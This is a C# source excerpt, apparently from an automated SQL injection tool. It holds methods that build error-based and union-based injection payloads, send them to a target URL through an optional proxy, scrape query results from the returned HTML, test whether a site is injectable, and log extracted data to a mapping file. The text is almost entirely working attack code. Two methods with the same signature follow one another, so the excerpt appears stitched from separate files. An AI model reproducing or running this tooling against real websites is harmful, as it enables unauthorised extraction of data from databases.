public string GetSingleCustomQueryResultRow(int startingFrom)
{
string result = string.Empty;
string generatedPayload = PayloadDetails.Payload;
if (PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0)
{
foreach (var param in PayloadDetails.Params)
{
generatedPayload = generatedPayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
}
}
if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple)
{
generatedPayload = string.Format(PayloadHelpers.GetSingleResultLimiter(PayloadDetails.Dbms),
generatedPayload, startingFrom);
}
string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, generatedPayload);
string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
result = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);
//@TODO: strip scripts
if (!string.IsNullOrEmpty(MappingFile) && !string.IsNullOrEmpty(result))
{
XmlHelpers.SaveToMappingFile(MappingFile, PayloadDetails, result, this,
(this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty);
}
return(result);
}
public bool TestIfVulnerable()
{
string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, GeneralPayloads.ErrorBasedVictimIdentifier);
string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
var result = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);
return(!string.IsNullOrEmpty(result) && result == GeneralPayloads.ErrorBasedVictimConfirmationResult);
}
public int GetTotalNoOfCustomQueryResultRows()
{
int count = 0;
string generatedpayload = string.Empty;
if (PayloadDetails == null)
{
return(0);
}
if (string.IsNullOrEmpty(PayloadDetails.Payload))
{
return(0);
}
if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Single)
{
return(1);
}
generatedpayload = PayloadDetails.Payload;
if (PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0)
{
foreach (var param in PayloadDetails.Params)
{
generatedpayload = generatedpayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
}
}
generatedpayload = /*UrlHelpers.HexEncodeValue(*/ string.Format(GeneralPayloads.QueryResultCount, generatedpayload);//);
string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, generatedpayload);
string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
string countString = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);
int.TryParse(countString, out count);
return(count);
}
public int GetTotalNoOfCustomQueryResultRows()
{
if (_nrCols == 0 || _nrVisibleCols == 0 || _visibleColumnIndexes.Count() == 0)
{
if (!TestIfVulnerable())
{
throw new SqlInjException("Given script is not injectable using current injection strategy");
}
}
int count = 0;
string generatedpayload = string.Empty;
if (PayloadDetails == null)
{
return(0);
}
if (string.IsNullOrEmpty(PayloadDetails.Payload))
{
return(0);
}
if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Single)
{
return(1);
}
generatedpayload = PayloadDetails.Payload;
if (PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0)
{
foreach (var param in PayloadDetails.Params)
{
generatedpayload = generatedpayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
}
}
generatedpayload = string.Format(GeneralPayloads.QueryResultCount, generatedpayload);
StringBuilder sbCurExploit = new StringBuilder();
sbCurExploit.AppendFormat(GeneralPayloads.UnionBasedSelectResultWrapper, generatedpayload);
if (_nrCols > 1)
{
sbCurExploit.Append(",");
}
for (int j = 1; j < _nrCols; j++)
{
sbCurExploit.Append(j.ToString());
if (j < _nrCols - 1)
{
sbCurExploit.Append(",");
}
}
string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, sbCurExploit.ToString());
string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
var result = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);
int.TryParse(result, out count);
return(count);
}
